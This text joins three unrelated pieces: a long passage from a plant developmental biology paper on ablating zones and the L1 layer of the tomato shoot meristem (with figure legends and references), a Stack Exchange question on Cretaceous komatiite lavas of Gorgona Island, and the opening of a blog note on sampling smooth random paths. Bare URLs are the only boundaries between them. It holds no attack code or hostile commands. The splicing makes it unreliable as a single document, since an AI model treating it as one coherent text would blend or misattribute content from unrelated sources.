A major concern with all surgical ablations is that they may cause wound or stress responses that complicate or even invalidate the conclusions from the experiments. For example, it could be argued that ectopic induction of WUS, or establishment of a new growth centre, may be influenced not only by the loss of the CZ cells, but also by wound effects from the lesions, or by secondary stress signals. In order to exclude such effects, we performed a number of control experiments. First, we performed laser ablations of similar magnitude not in the CZ but in the PZ at the site of incipient leaf formation (Fig. 4A). Such ablations affected the positioning of new leaves in two ways. Either the site of the ablation was skipped and the next primordium was initiated at the next expected position (Fig. 4B,C), or the primordia were displaced to either side of the lesion (Fig. 4D,E), resulting in a smaller or larger divergence angle than expected. If ablations were performed in the centre of the youngest primordium (P1), it became split (Fig. 4F). However, we never observed a reorientation of the growth axis after ablations at the PZ, indicating that despite the strong local effects on organ formation, the ablations did not affect the neighbouring CZ or lead to establishment of a new meristem centre. To confirm this, we analysed LeWUS expression after ablations at the PZ (Fig. 4G). LeWUS continued to be expressed in an area similar to that in control meristems although the expression level tended to decrease after ablation (Fig. 4H). The fact that ectopic induction of LeWUS was not found after peripheral ablations shows that wounding per se is not sufficient to induce ectopic LeWUS expression. Fig. 4. Control treatments do not influence the central zone. (A-H) Laser ablations (yellow arrowheads) as in Fig. 2C, but at the periphery instead of the centre.
(A) Laser ablation at the periphery approximately at the site of incipient leaf formation. (B,C) Consecutive video images of a single meristem with an ablation as in (A). Cut primordia are dark green, and the youngest primordia are highlighted in yellow for clarity. (B) Immediately after ablation (t0); (C) 2 days after ablation. Leaf formation at the site of the ablation is suppressed (arrowheads), while two new primordia (I1 and I2) were induced at the next two expected positions. (D,E) Consecutive video images of a single meristem with an ablation as in (A). (D) t0; (E) 2 days after ablation. I1 is initiated closer to P1 than normal, resulting in a divergence angle of approximately 90° instead of 137°. Arrowheads point to the lesion. (F) Ablation on P1. 2 days after the ablation (arrowhead), the primordium has recovered and split in two halves. (G) In situ hybridisation with a LeWUS probe 6 hours after an ablation at the periphery. The LeWUS expression domain remained normal. (H) 2 days after ablation, the lesion was displaced (arrowhead), and LeWUS continued to be expressed in the normal area. (I-L) Effects 4 days after treatments of the CZ with stress metabolites and oxidants. (I) Control. (J) Treatment with 1 mM salicylic acid. (K) Treatment with 1 mM hydrogen peroxide. (L) Treatment with 0.1 mM Paraquat. Treatments did not affect the formation rate or the positioning of leaf primordia. Lanolin paste (red) remained in the centre, indicating that the growth centre persisted. P5, P4, P3, P2 and P1 indicate the bases of pre-existing leaf primordia that were removed at the beginning of the experiment; I1, I2 and I3 indicate primordia formed after the ablation. Scale bars: 100 μm.

In order to test for effects of secondary stress signals that might be generated by ablation, we treated the centre of meristems with salicylic acid (Fig. 4J), H2O2 (Fig. 4K), Paraquat (Fig. 4L) or jasmonic acid (not shown). After all these treatments, leaves were formed at normal rates and at the normal position. In all cases, the lanolin paste was not displaced at all (Fig.
4J,L) or only slightly (Fig. 4K), indicating that the centre of the meristem was still functional and had not moved compared to controls (Fig. 4I). From these control treatments, it can be concluded that ectopic induction of LeWUS and initiation of a new meristem centre after ablations of the CZ is a specific response to the removal of the CZ, and not a general stress response to wounding or secondary stress signals. It follows that under normal conditions, LeWUS expression at the flank is repressed by cells in the CZ, and that this block is released by the ablations.

### Ablation of the distal part of the CZ does not lead to rapid ectopic induction of LeWUS

The ablations discussed in the previous sections removed the entire CZ including the LeWUS-expressing cells (Figs 2, 3). To test the effect of removal of only the distal portion of the CZ, we performed ablations at the meristem centre that were about 8 cells in diameter and reached approximately 4-5 cell layers deep. Such ablations removed most of the cells distal to the LeWUS-expressing cells, presumably including all stem cells, while leaving the LeWUS-expressing cells intact (Fig. 5A,B, compare with Fig. 2B). We assume that the rapid induction of LeWUS after elimination of the entire CZ is due to the release of inhibition from cells in the centre. If this inhibition originates from the distal cells of the CZ, the result of deep and partial ablations would be expected to be similar, because in both cases the distal cells are removed. If, however, cells in deeper layers were responsible for LeWUS limitation, then the outcome of the complete and partial CZ ablations would be expected to be different.

Fig. 5. Expression of LeWUS after ablation of the stem cells. (A) Longitudinal section through a meristem after ablation of the upper four to five cell layers. (B-D) Transverse sections showing LeWUS expression at various times after ablation as in A. (B) Immediately after ablation. (C) One day after ablation.
(D) Three days after ablation. P1 indicates the leaf primordium that was present at the beginning of the experiment; I1 denotes a primordium that was formed after the ablation. Scale bars: 100 μm.

After ablation of the distal cells, we followed LeWUS expression in the meristem for a week, with emphasis on the first 3 days. It was of special interest to see whether the LeWUS-expressing area in the meristem expands laterally, as would be the case if peripheral cells were released from suppression after the ablation. However, the LeWUS-expressing domain in the CZ remained approximately the same size after 1 and 3 days (Fig. 5C,D) and after 2, 4 and 6 days (data not shown). Nevertheless, ablated meristems were able to recover, and to establish a new functional growth centre (data not shown). It is possible that after partial ablations, a gradual shift of the LeWUS-expressing domain occurred, rather than an overall expansion. Such a shift, which would escape detection by in situ hybridisation analysis, could allow for a new growth centre to be induced beside the lesion.

### The role of the L1 layer in meristem function

The previous experiments, which involved complete and partial ablations of zones of the meristem (CZ and PZ), showed the high efficiency with which the remaining tissues compensated for the loss by adjusting their fates.
In another series of experiments, we asked what the role of the L1 is in meristem development, and whether the layers of the meristem are as flexible as the zones. By single low-energy pulses of the laser directed at the summit of the meristem, small patches of cells in the centre of the L1 layer were ablated (Fig. 6A,B). Similar to ablations of the entire CZ (Fig. 2), such lesions did not perturb organ formation at the periphery (Fig. 6C-E). After 5 days, the meristems had formed 3.28±0.93 (s.d.) new leaf primordia (n=73), compared to controls that had formed 2.86±0.66 (s.d.) leaf primordia (n=14), and the primordia were initiated at the normal positions. However, the development of the cells just below the lesion was altered (Fig. 6F). Instead of dividing anticlinally to propagate the continuous layers of the meristem, they started to divide predominantly periclinally, leading to the formation of cell stacks that grew out perpendicularly to the surface (Fig. 6F). This indicates that the L1 layer normally exerts a restriction on such cell divisions. Later, superficial lesions were displaced from the meristem, indicating that the growth centre of the meristem was displaced to the flank (data not shown). However, this shift of the growth centre appeared to be delayed compared to the establishment of a new growth centre after ablations of the entire CZ. After 6 days, only 51 out of 73 superficial lesions were displaced from the meristem (70%), whereas in the case of ablations of the entire CZ, after 4 days, i.e. 2 days earlier, already 19 out of 22 lesions were displaced from the meristem (86%).

Fig. 6. Laser ablations of the L1 layer in the centre have local effects on cell division orientation, but not on meristem maintenance and phyllotaxis. (A) Scanning electron micrograph of a meristem immediately after superficial ablation in the centre (yellow arrowhead). (B) Longitudinal section of a meristem immediately after treatment as in A.
(C-E) Consecutive video images of a single meristem after ablation as in A: (C) 1 day, (D) 2 days and (E) 3 days after ablation. Note normal phyllotaxis. (F) Longitudinal section through a meristem 5 days after ablation as in A. Note periclinal divisions in cells just below the ablation. P2 and P1 indicate leaf primordia that were present at the beginning of the experiment; I1 and I2 indicate primordia formed after the ablation. Scale bars: 100 μm.

Since the L1 layer appears to influence the development of subtending meristem cells, we were interested to see whether leaf formation required the L1 layer. Owing to the curved surface of the meristem, the laser beam could not be focused evenly onto larger regions of the L1 layer. Therefore, we developed a microsurgical method to ablate larger portions of the L1 layer. Incisions were made on the abaxial (outer) side of young primordia at the base. The incisions were made as deep as possible without severing the epidermis of the adaxial side (towards the meristem). Then the primordia were pulled over the meristem, drawing with them a sector of the L1 layer.
This technique led to surprisingly clean removal of the L1 while leaving the L2 layer intact (Fig. 7A,D,G).

Fig. 7. Surgical ablation of the L1 layer leads to aberrant cell division and differentiation in L2 and L3. (A-C) Consecutive video images of a single meristem from which the left half of the L1 layer was removed. Cut primordia are coloured in dark green, and the youngest primordia are highlighted in yellow: (A) t0, (B) 2 days and (C) 4 days after ablation. Organ formation continues from the unperturbed half, and the meristem centre is shifted to the right. (D-F) Consecutive video images of a meristem from which most of the L1 layer has been removed: (D) t0, (E) 2 days, (F) 4 days. Meristem activity ceases. Note that a final primordium is formed at the normal position (I1). (G-I) Longitudinal sections through meristems after a surgical ablation as in D. (G) Note the continuity of the L2 layer at the site of the ablation (between arrows). (H) Two days after ablation as in (D). A last primordium was formed (I1), while the cells at the ablated site (arrowhead) became vacuolated and started to divide periclinally. (I) Five days after ablation as in (D). Note stacks of cells resulting from repeated periclinal division, and increasing vacuolisation (arrowhead). (J) Close-up of (I). Note different cell division patterns and cell shape in the area where a primordium had been removed at the beginning of the experiment (arrow), compared to the site at which the L1 was ablated (arrowhead). (K-M) In situ hybridisations with a 35S-labelled antisense probe against LeT6. Tomato meristems were treated as in (D), and fixed for analysis either immediately (K), or after 2 days (L) and 5 days (M). LeT6 signal can be observed at the ablated site until 2 days after the ablation (L). After 5 days, the vacuolated cells exhibited low levels of LeT6 mRNA, whereas high levels of LeT6 remained in the lower L3 cells that exhibit less vacuolisation.
P4, P3, P2 and P1 indicate the bases of pre-existing leaf primordia that were removed at the beginning of the experiment; I1 and I2 indicate primordia formed after the ablation. Scale bars: 100 μm (A-I, K-M); 50 μm (J).

When approximately half of the L1 was removed (Fig. 7A-C), leaf formation continued, but only from the intact half of the meristem. During the following days, the lesions were displaced from the meristem, indicating that the growth centre of the meristem had been shifted towards the intact flank (Fig. 7C). When most of the L1 was removed (Fig. 7D), leaf formation was abolished, either immediately, or after the formation of one last leaf (which was initiated only when a small marginal strip of L1 was retained; Fig. 7E). After 4 days, these meristems became dramatically expanded (Fig. 7F). Histological sections revealed that the enlargement of the meristem was due both to cell expansion and to cell division at the peeled site (Fig. 7G-J). Two days after L1 ablations, enlarged cells and periclinal divisions were evident (Fig. 7H), and after 5 days, stacks of vacuolated cells had formed at the peeled site (Fig. 7I,J). This change in cell behaviour is similar to, although more accentuated than, that following local L1 ablations (compare with Fig. 6F). The ordered cell stacks formed at the site of the L1 ablations contrasted with the irregular callus formed at the cut surfaces of primordia bases (Fig. 7J). The fact that organ formation was never observed in an area from which the L1 layer was ablated points to a special role of this layer in organ formation. However, since the loss of L1 also led to the loss of meristem characteristics in subtending cells, the defect in organogenesis could also be indirectly caused by the loss of meristem identity.
To test this possibility, we followed the expression of the meristem marker LeT6. This gene continued to be expressed for several days after L1 ablation (Fig. 7K-M), but concomitantly with vacuolisation and periclinal divisions, LeT6 expression faded away in the upper layers (Fig. 7M). Thus, the loss of meristem identity developed more slowly than the immediate block of organ formation at the ablated site.

### Combining classical ablation approaches with modern technology

In recent years, our understanding of the functioning of the shoot apical meristem has dramatically expanded, mostly as a result of sophisticated genetic analyses in Arabidopsis thaliana. The current genetics-based models do, however, incorporate conclusions based on classical tissue ablation experiments. The latter fascinating and highly informative experiments were performed at a time when many of the tools that we now take for granted were not yet available. Our present study revisits these classical experiments. Thanks to modern tools, such as high-power binocular microscopes, scanning electron microscopy, sterile meristem culture and laser-directed tissue ablation, we were able to remove smaller and better-defined pieces of tissue, and to follow the effect of the manipulations from early time points. In addition, we performed important control experiments to confirm that the responses to ablations are not due to general wound effects, an issue that today is probably considered more critical than it was half a century ago. Another important modern tool is molecular markers, which allowed us to establish tissue identities. We note, however, that the number of markers available in tomato is rather limited. Similarly, it would have been very useful to perform these manipulations in mutant backgrounds. It is unfortunate that its small and inaccessible meristem makes Arabidopsis completely unsuitable for this type of experiment.
Micromanipulation experiments, such as the ones presented here, can only provide indications of novel dynamic interactions in the meristem. They can direct the further genetic and biochemical experiments that are required to build definitive molecular models.

### Ablation of the CZ leads to the establishment of a new meristem centre from the PZ but has no direct effect on organogenesis

Clonal analysis has demonstrated that the postembryonic leaves originate from a few stem cells in the CZ (Stewart and Dermen, 1970), emphasising the pivotal function of the CZ. The importance of the CZ is also supported by a wealth of genetic data. For instance, expression of the WUS gene in the CZ is necessary and sufficient for stem cell induction and maintenance (Mayer et al., 1998; Schoof et al., 2000). Confirming and extending classical ablation experiments, we show here that after removal of the CZ, including the LeWUS-expressing cells, by infrared laser ablation, a new functional meristem centre is rapidly and efficiently established from cells in the PZ. This indicates that ablated stem cells can be replaced by cells at the periphery. After ablation of the CZ, leaves continued to be initiated without the slightest lag. Notably, several new leaves were formed before the new growth centre became evident, indicating that despite the lack of stem cells, the pool of meristematic cells was large enough to sustain organogenesis for several plastochrons. This temporal sequence of events clearly indicates that the CZ has no direct role in organ formation and patterning of the apex, except as the ultimate source of cells (Steeves and Sussex, 1989). Mutants with a perturbed CZ frequently exhibit defects in organogenesis; however, this effect is indirect. For instance, the cessation of leaf formation in the wus mutant is an indirect effect of stem cell depletion (Mayer et al., 1998).
Similarly, the irregular phyllotaxis in the clavata mutants is likely to be an indirect effect of irregular enlargement of the apex (Clark et al., 1993; Clark et al., 1995).

### LeWUS induction in the PZ precedes initiation of a new meristem centre

Differences between the cells of the CZ and PZ have been identified by several different means, e.g. cytological markers, gene expression profiles, cell division activity and organogenic capacity. Consequently, the establishment of a new meristem centre from the periphery involves the reprogramming of cells. After ablation of the CZ, the tomato WUS homologue LeWUS was rapidly induced in the PZ, before a new meristem centre became apparent (compare Fig. 2E and Fig. 3D). We propose that LeWUS expression in the PZ induced the overlying cells to regenerate a new growth centre. In Arabidopsis, limitation of the WUS-expressing OC is mediated by the CLV3 signal from the overlying stem cells (Simon, 2001; Fletcher, 2002; Gross-Hardt and Laux, 2003). The observation of ectopic WUS induction after ablations of the CZ is compatible with an inhibitory signal coming from the centre and acting on the periphery. However, on the basis of this experiment, it cannot be decided which cells in the CZ are responsible for WUS suppression. To address this question, we ablated only the distal portion of the CZ, approximately eight cells wide and approximately four to five cell diameters deep (Fig. 5). This treatment left the LeWUS domain intact (compare Fig. 2B with Fig. 5A,B), but is likely to have destroyed most if not all of the overlying stem cells. Three days after ablation of the distal cells, the LeWUS zone remained approximately the same size (Fig. 5); hence, ectopic induction of LeWUS was not observed. It is conceivable that the partial ablations led to a slower and more moderate induction of LeWUS, or a gradual shift of the OC, which escaped detection by in situ analysis.
Alternatively, considering the large difference between the responses to superficial and deep ablations, the cells in deeper layers may play a special role in preventing ectopic LeWUS induction. For instance, the LeWUS-expressing cells could inhibit LeWUS expression in neighbouring cells by a mechanism analogous to lateral inhibition. It is also conceivable that as yet unknown signals are involved. This type of micromanipulation experiment can provide useful indications of dynamic interactions that may remain hidden in genetic approaches. However, we emphasise again that with the paucity of mutants and molecular markers in tomato, it is hard to arrive at conclusive molecular models.

### The L1 layer controls cell division orientation and meristem maintenance

Ablations of the L1 layer led to local changes in cell division patterns from anticlinal to periclinal in the subtending cell layers (Figs 6, 7). This was the case irrespective of whether the ablations affected only a limited area or the entire meristem surface. This regular cell division pattern was clearly different from the irregular callus-like proliferation at the base of cut primordia (Fig. 7J), indicating that it is a characteristic feature of meristem cells. Since similar aberrations in cell division patterns were not found in any other ablation, we propose that this response is not a general wound response, but is specifically due to the loss of the L1. Genetic perturbation of the embryo protodermal layer (corresponding to the L1 layer) by L1-specific expression of a cytotoxic gene led to defects in subtending cell layers of the Arabidopsis root (Baroux et al., 2001). In particular, the cell division pattern was affected, resulting in supernumerary cell tiers in the embryonic root tip, similar to the development after our L1 ablations. Thus, the L1 layer controls cell division patterns in subtending cell layers, and prevents periclinal cell divisions.
Secondly, we observed a gradual loss of meristem identity, as judged by increasing cell expansion and decreasing LeT6 expression. This occurred only when most of the L1 layer was ablated. In combination with periclinal cell divisions (see above), this resulted in stacks of vacuolated cells that resembled differentiating stem cortex tissue. Therefore, the L1 not only controls cell division, but also prevents cell differentiation in lower cell layers.

### Role of the L1 layer in organ formation

It has been proposed that biophysical forces in the L1 layer regulate organ formation and meristem patterning, with no necessity for specific chemical signals in the meristem (Green, 1996). Biophysical regulation is thought to be based on tensile and compressive forces within the meristem. According to these models, such forces result from the geometry and the growth of the apex and operate on the meristem (including the L1) as a whole. Although computational modelling can recreate natural phyllotactic patterns (Green, 1992; Green, 1996), experimental evidence for the involvement of biophysics has proved difficult to gain. In our experiments, ablations had only local effects on organ formation and positioning, and none of the ablations had 'systemic' effects on organ formation in unperturbed parts of the meristem. Therefore, our results do not support a role for biophysical mechanisms in meristem patterning. However, we emphasise that once the site of organ formation is determined, the execution of the organogenic programme is likely to involve biophysics, particularly the modulation of cell wall properties (Fleming et al., 1997; Reinhardt et al., 1998; Pien et al., 2001). An immediate effect of L1 ablations was the complete block of organ formation at the ablated site, although the remaining L2 and L3 cells were still able to divide and to expand (see above). Could the lack of organ formation be due to the loss of meristem identity in subtending layers?
We do not think so, since the loss of meristem identity developed only gradually, and after 5 days meristematic cells were still evident in the L3. In contrast, the block in organ formation was immediate and complete, since an organ was never formed at a site devoid of L1. Therefore, the block in organ formation is unlikely to be an indirect consequence of meristem degeneration, but appears to be a direct consequence of the loss of the L1. The similarity of the defects caused by genetic L1 ablations to the phenotypes of bodenlos and monopteros mutants may indicate a role of the L1 layer in auxin-related patterning of the embryonic root (Baroux et al., 2001). Since leaf formation at the shoot meristem is controlled by auxin (Reinhardt et al., 2000; Kuhlemeier and Reinhardt, 2001; Reinhardt and Kuhlemeier, 2002; Stieger et al., 2002), the fact that leaf formation was blocked at sites bare of L1 could also point to an auxin-related role of the L1 in this process. Since CZ ablations did not affect leaf formation, it is likely that the auxin-based mechanism operates in the PZ, but not in the CZ. While leaf formation in the vegetative meristem requires the L1 layer (see above), there is an influence of the lower layers in flower development. lateral suppressor (ls) mutants of tomato lack petals. However, a periclinal chimera with an ls mutant L1 layer and wild-type L2 and L3 layers has normal flowers (Szymkowiak and Sussex, 1993), indicating that in this case, the L1 responded to organogenic signals from lower layers. It is conceivable that factors from the L1 layer, as well as factors from lower layers, are required to allow organ formation.

### Regenerative capacities of plant cells

An important feature of L1 ablations was the lack of regeneration. In contrast to the rapid regeneration of a new growth centre after ablation of the CZ, the L1 could never be regenerated, even after ablations of limited extent.
Although single cells that are displaced to the L1 from the L2 layer can adopt L1 identity (Tilney-Basset, 1986), this depends on the presence of L1 neighbours. Without information from neighbouring L1 cells, L1 identity cannot be expressed in L2 cells; therefore, de novo formation of the L1 (or the epidermis) is not possible in plants (Bruck and Walker, 1985). The re-establishment of a new CZ after ablation implies rapid and efficient regeneration of functional stem cells from organogenic cells at the periphery. This reveals a remarkable flexibility of plant cell fate compared to animals. It has long been assumed that adult animal stem cells cannot be replaced once they are lost. However, evidence is now accumulating that under certain experimental conditions, stem cells can be (re)generated by dedifferentiation or transdifferentiation from cells with other (more differentiated) identities (Blau et al., 2001). However, this occurs at low frequency and may, in some cases, be due to activation of hidden pluripotent stem cells rather than to plasticity of differentiated cells (Weissman, 2000). It is therefore a matter of debate to what extent regeneration of stem cells is relevant for animal development (Holden and Vogel, 2002). In contrast, establishment of new stem cells in plants is clearly part of normal development. Reinitiation of stem cells in axillary meristems is the basis for the branched architecture of plants, and routinely allows breeders to clonally propagate plants much more easily than animals.

We thank Lara Reale and Francesco Ferranti for generous technical advice while hosting one of us (T.M.), Neelima Sinha for providing the LeT6 cDNA, and Jennifer Fletcher, Thomas Laux, Pia A. Stieger and Jeroen Stuurman for critical reading of the manuscript. This work was supported by a Swiss National Science Foundation grant to C.K. and D.R.

Baroux, C., Blanvillain, R., Moore, I. R. and Gallois, P. (2001).
Transactivation of BARNASE under the AtLTP1 promoter affects the basal pole of the embryo and shoot development of the adult plant in Arabidopsis. Plant J. 28, 503-515.

Blau, H. M., Brazelton, T. R. and Weimann, J. M. (2001). The evolving concept of a stem cell: Entity or function? Cell 105, 829-841.

Brand, U., Fletcher, J. C., Hobe, M., Meyerowitz, E. M. and Simon, R. (2000). Dependence of stem cell fate in Arabidopsis on a feedback loop regulated by CLV3 activity. Science 289, 617-619.

Bruck, D. K. and Walker, D. B. (1985). Cell determination during embryogenesis in Citrus jambhiri. II. Epidermal differentiation as a one-time event. Amer. J. Bot. 72, 1602-1609.

Chen, J.-J., Janssen, B.-J., Williams, A. and Sinha, N. (1997). A gene fusion at a homeobox locus: Alterations in leaf shape and implications for morphological evolution. Plant Cell 9, 1289-1304.

Clark, S. E., Running, M. P. and Meyerowitz, E. M. (1993). CLAVATA1, a regulator of meristem and flower development in Arabidopsis. Development 119, 397-418.

Clark, S. E., Running, M. P. and Meyerowitz, E. M. (1995). CLAVATA3 is a specific regulator of shoot and floral meristem development affecting the same process as CLAVATA1. Development 121, 2057-2067.

Clark, S. E., Williams, R. W. and Meyerowitz, E. M. (1997). The CLAVATA1 gene encodes a putative receptor kinase that controls shoot and floral meristem size in Arabidopsis. Cell 89, 575-585.

Fleming, A. J., McQueen-Mason, S., Mandel, T. and Kuhlemeier, C. (1997). Induction of leaf primordia by the cell wall protein expansin. Science 276, 1415-1418.

Fletcher, J. C., Brand, U., Running, M. P., Simon, R. and Meyerowitz, E. M. (1999). Signaling of cell fate decisions by CLAVATA3 in Arabidopsis shoot meristems. Science 283, 1911-1914.

Fletcher, J. C. (2002). Shoot and floral meristem maintenance in Arabidopsis. Annu. Rev. Plant Biol. 53, 45-66.

Frenz, M., Pratisto, H., Könz, F., Jansen, E. D., Welch, A. J. and Weber, H. P. (1996).
Comparison of the effects of absorption coefficient and pulse duration of 2.12-μm and 2.79-μm radiation on laser ablation of tissue. IEEE J. Quant. Elect. 32 , 2025 -2036. Gilbert, S. F. ( 2000 ). Developmental Biology , 6th edition. Sunderland, Massachusetts: Sinauer Associates. Green, P. B. ( 1992 ). Pattern formation in shoots: A likely role for minimal energy configurations of the tunica. Int. J. Plant Sci . 153 , S59 -S75. Green, P. B. ( 1996 ). Expression of form and pattern in plants – a role for biophysical fields. S emin. Cell Dev. Biol. 7 , 903 -911. Gross-Hardt, R. and Laux, T. ( 2003 ). Stem cell regulation in the shoot meristem. J. Cell Sci. 116 , 1659 -1666. Hantke, S. S., Carpenter, R. and Coen, E. S.( 1995 ). Expression of floricaula in single cell layers of periclinal chimeras activates downstream homeotic genes in all layers of floral meristems. Development 121 , 27 -35. Holden, C. and Vogel, G. ( 2002 ). Plasticity:Time for a reappraisal? Science 296 , 2126 -2129. Jackson, D., Veit, B. and Hake, S. ( 1994 ). Expression of maize KNOTTED1 related homeobox genes in the shoot apical meristem predicts patterns of morphogenesis in the vegetative shoot. Development 120 , 405 -413. Könz, F., Frenz, M., Romano, V., Forrer, M., Weber, H. P.,Kharkovskiy,A. V. and Khomenko, S. I. ( 1993 ). Active and passive Q-switching of 2.79 μm Er:Cr:YSGG laser. Optics Commun. 103 , 398 -404. Kuhlemeier, C. and Reinhardt, D. ( 2001 ). Auxin and phyllotaxis. Trends Pl. Sci. 6 , 187 -189. Loiseau, J.-E. ( 1959 ). Observation et expérimentation sur la phyllotaxie et le fonctionnement du sommet végétatif chez quelques balsaminacées. Ann. Sci. Nat. Bot. Ser . 11 , 1 -214. Long, J. A., Moan, E. I., Medford, J. I. and Barton, M. K.( 1996 ). A member of the KNOTTED class of homeodomain proteins encoded by the STM gene of Arabidopsis. Nature 379 , 66 -69. Long, J. and Barton, M. K. ( 2000 ). Initiation of axillary and floral meristems in Arabidopsis. Dev. Biol . 218 , 341 -353. 
Loreto, F., Mannozzi, M., Maris, C., Nascetti, P., Ferranti, F. andPasqualini, S. ( 2001 ). Ozone quenching properties of isoprene and its antioxidant role in leaves. Plant Phys. 126 , 993 -1000. Lyndon, R. F. ( 1998 ). The Shoot Apical Meristem – Its Growth and Development . Cambridge, UK: Cambridge University Press. Mayer, K. F. X., Schoof, H., Haecker, A., Lenhard, M.,Jürgens, G. andLaux, T. ( 1998 ). Role of WUSCHEL in regulating stem cell fate in the Arabidopsisshoot meristem. Cell 95 , 805 -815. Parnis, A., Cohen, O., Gutfinger, T., Hareven, D., Zamir, D. and Lifschitz,E. ( 1997 ). The dominant developmental mutants of tomato, mouse-ear and curl, are associated with distinct modes of abnormal transcriptional regulation of a KNOTTEDgene. Plant Cell 9 , 2143 -2158. Pien, S., Wyrzykowska, J., McQueen-Mason, S., Smart, C. and Fleming,A. ( 2001 ). Local expression of expansin induces the entire process of leaf development and modifies leaf shape. 98 , 11812 -11817. Pilkington, M. ( 1929 ). The regeneration of the stem apex. New Phytol. 28 , 37 -53. Reinhardt, D., Wittwer, F., Mandel, T. and Kuhlemeier, C.( 1998 ). Localized upregulation of a new expansin gene predicts the site of leaf formation in the tomato meristem. Plant Cell 10 , 1427 -1437. Reinhardt, D., Mandel, T. and Kuhlemeier, C.( 2000 ). Auxin regulates the initiation and radial position of plant lateral organs. Plant Cell 12 , 507 -518. Reinhardt, D. and Kuhlemeier, C. ( 2002 ). Phyllotaxis in higher plants. In Meristematic tissues in plant growth and development (ed. M. T. McManus and B. E. Veit), pp. 172 -212. Sheffield, UK: Sheffield Academic Press. Schoof, H., Lenhard, M., Haecker, A., Mayer, K. F. X.,Jürgens, G. andLaux, T. ( 2000 ). The stem cell population of Arabidopsis shoot meristems is maintained by a regulatory loop between the CLAVATA and WUSCHEL genes. Cell 100 , 635 -644. Simon, R. ( 2001 ). Function of plant shoot meristems. Semin. Cell Dev. Biol . 12 , 357 -362. Steeves, T. A. 
and Sussex, I. M. ( 1989 ). Patterns in Plant Development. New York: Cambridge University Press. Stewart, R. N. and Dermen, H. ( 1970 ). Determination of number and mitotic activity of shoot apical initial cells by analysis of mericlinal chimeras. Amer. J. Bot. 57 , 816 -826. Stieger, P. A., Reinhardt, D. and Kuhlemeier, C.( 2002 ). The auxin influx carrier is essential for correct leaf positioning. Plant J. 32 , 509 -517. Stuurman, J., Jäggi, F. and Kuhlemeier, C.( 2002 ). Shoot meristem maintenance is controlled by a GRAS-gene mediated signal from differentiating cells. Genes Dev. 16 , 2213 -2218. Sussex, I. M. ( 1964 ). The permanence of meristems: Developmental organizers or reactors to exogenous stimuli? Brookhaven Symp. Biol . 16 , 1 -12. Szymkowiak, E. J. and Sussex, I. M. ( 1992 ). The internal meristem layer (L3) determines floral meristem size and carpel number in tomato periclinal chimeras. Plant Cell 4 , 1089 -1100. Szymkowiak, E. J. and Sussex, I. M. ( 1993 ). Effect of lateral suppressor on petal initiation in tomato. Plant J. 4 , 1 -7. Szymkowiak, E. J. and Sussex, I. M. ( 1996 ). What chimeras can tell us about plant development. Annu. Rev. Plant Physiol. Plant Mol. Biol . 47 , 351 -376. Tilney-Basset, R. A. E. ( 1986 ). Plant Chimeras. London: Edward Arnold. van den Berg, C., Willemsen, V., Hage, W., Weisbeek, P. and Scheres, B. ( 1995 ). Cell fate in the Arabidopsisroot meristem determined by directional signalling. Nature 378 , 62 -65. van den Berg, C., Willemsen, V., Hendriks, G., Weisbeek, P. and Scheres,B. ( 1997 ). Short-range control of cell differentiation in the Arabidopsis root meristem. Nature 390 , 287 -289. Vernoux, T., Kronenberger, J., Grandjean, O., Laufs, P. and Traas, J. ( 2000 ). PIN-FORMED1 regulates cell fate at the periphery of the shoot apical meristem. Development 127 , 5157 -5165. Weigel, D. and Jürgens, G. ( 2002 ). Stem cells that make stems. Nature 415 , 751 -754. Weissman, I. L. ( 2000 ). 
Stem cells: Units of development, units of regeneration, and units in evolution. Cell 100 , 157 -168.
https://earthscience.stackexchange.com/questions/4463/what-caused-the-high-temperatures-that-resulted-in-the-cretaceous-aged-komatiite
# What caused the high temperatures that resulted in the Cretaceous aged komatiite lavas of Gorgona Island, Colombia?

According to the San Diego State University (SDSU) webpage Unusual Lava Types, komatiites are ultramafic volcanic rocks with very low silica contents (~40-45%) and very high $\ce{MgO}$ contents (~18%). These lavas are exceptional not only for their compositions, but also for their very old, restricted ages. These lavas have no modern analogs. The vast majority of komatiite deposits, according to the SDSU webpage, are about 3 Ga or older in age, because:

These ancient lava flows erupted at a time when the Earth's internal heat was much greater than today, thus generating exceptionally hot, fluid lavas with calculated eruption temperatures in excess of 1,600 degrees C (2,900 degrees F).

However, as with many things in science, there are exceptions - according to the SDSU webpage, Gorgona Island, Colombia has komatiite deposits that are Cretaceous in age (around 90 Ma). The presence of young komatiite hints at higher temperatures at formation - something that has not been seen in any significant amount since the Archaean. What caused the high temperatures that resulted in the Cretaceous aged komatiite lavas of Gorgona Island, Colombia?
https://jack.valmadre.net/notes/2020/01/06/sample-smooth-paths/
Jupyter notebook here

Sometimes it's useful to generate random smooth paths that hang around the origin. The simplest way to obtain a random path is to generate a random walk where each step is independent and normally distributed. To make the path smooth, we have a couple of options: (1) we could smooth the path with a low-pass filter, or (2) we could integrate the random walk again such that the second derivative is normally distributed rather than the first derivative. However, one problem with these approaches is that the paths might stray arbitrarily far from the origin. Here's a simple technique that I use to generate smooth paths that don't stray too far.

Let's consider the problem of sampling a path of length $N$ in one dimension. We can always sample multiple independent paths to obtain a multi-dimensional path. The idea is simply to sample from a Gaussian distribution with precision matrix (inverse covariance matrix) where $\Lambda_1 = D_1^T D_1$ and $\Lambda_2 = D_2^T D_2$ and $D_{i}$ is a finite difference operator of order $i$. The finite difference matrix $D_i$ then has shape $(N - i) \times N$. To sample from the distribution $\mathcal{N}(0, \Lambda^{-1})$, we need a matrix $A$ such that $A A^{T} = \Lambda^{-1}$. This can be obtained by computing an eigendecomposition $\Lambda = V D V^T$ and setting $A = V D^{-\frac{1}{2}}$. To obtain a path, we then take $x = A \epsilon$ where $\epsilon$ is drawn from a unit normal distribution.

Efficient technique

However, the above approach requires us to compute a factorization of a large (admittedly sparse) matrix. This can be avoided if we are willing to instead consider sampling periodic smooth paths. If we assume the paths to be periodic, then the finite difference matrices will be square and circulant. Circulant matrices can be diagonalized using the Discrete Fourier Transform. For engineers like me, this diagonalization is hiding in the familiar convolution identity.
